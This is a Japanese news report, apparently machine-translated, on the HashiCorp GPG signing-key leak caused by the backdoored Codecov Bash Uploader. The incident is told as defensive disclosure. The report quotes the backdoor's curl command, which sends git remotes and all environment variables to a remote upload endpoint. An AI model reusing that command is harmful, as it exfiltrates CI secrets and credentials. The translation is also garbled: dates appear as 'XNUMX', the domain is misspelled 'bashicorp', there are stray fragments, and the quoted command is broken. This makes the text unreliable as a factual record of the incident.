オープンソース ツール Vagrant、Packer、Nomad、Terraform の開発で知られる HashiCorp は、リリースを検証するデジタル署名の作成に使用される GPG 秘密鍵が漏洩したと発表しました。 GPG キーにアクセスした攻撃者は、正しいデジタル署名で検証することにより、HashiCorp 製品に隠れた変更を加える可能性があります。 同時に同社は、監査中にそのような変更を加えようとした形跡は確認されなかったと述べた。
現在、侵害された GPG キーは取り消され、代わりに新しいキーが導入されています。 この問題は、SHA256SUM および SHA256SUM.sig ファイルを使用した検証にのみ影響し、releases.bashicorp.com を通じて提供される Linux DEB および RPM パッケージのデジタル署名の生成や、macOS および Windows のリリース検証メカニズム (AuthentiCode) には影響しませんでした。 。
この漏洩は、継続的統合システムからカバレッジ レポートをダウンロードするように設計されたインフラストラクチャでの Codecov Bash Uploader (codecov-bash) スクリプトの使用が原因で発生しました。 Codecov 社への攻撃では、指定されたスクリプトにバックドアが隠蔽され、そこを通じてパスワードと暗号化キーが攻撃者のサーバーに送信されました。
ハッキングのために、攻撃者は Codecov Docker イメージの作成プロセスのエラーを利用し、codecov.io から配布された Bash Uploader スクリプトに変更を加えるために必要な GCS (Google Cloud Storage) へのアクセス データを抽出できるようにしました。 Webサイト。 この変更は 31 月 XNUMX 日に行われ、XNUMX か月間検出されず、攻撃者が顧客の継続的統合システム環境に保存されている情報を抽出できるようになりました。 攻撃者は、追加された悪意のあるコードを使用して、テストされた Git リポジトリと、アプリケーション コード、リポジトリ、アマゾン ウェブ サービスや GitHub などのサービスへのアクセスを組織するために継続的統合システムに送信されるトークン、暗号化キー、パスワードを含むすべての環境変数に関する情報を取得する可能性があります。
直接呼び出しに加えて、Codecov Bash Uploader スクリプトは、Codecov-action (Github)、Codecov-circleci-orb、Codecov-bitrise-step などの他のアップローダーの一部としても使用されており、これらのユーザーもこの問題の影響を受けます。 codecov-bash および関連製品のすべてのユーザーは、インフラストラクチャを監査し、パスワードと暗号化キーを変更することをお勧めします。 スクリプト内のバックドアの存在は、curl -sm 0.5 -d “$(git Remote -v)<<<<<< ENV $(env)” http:// という行の存在によって確認できます。 /アップロード/v2 || 真実
出所: オープンネット.ru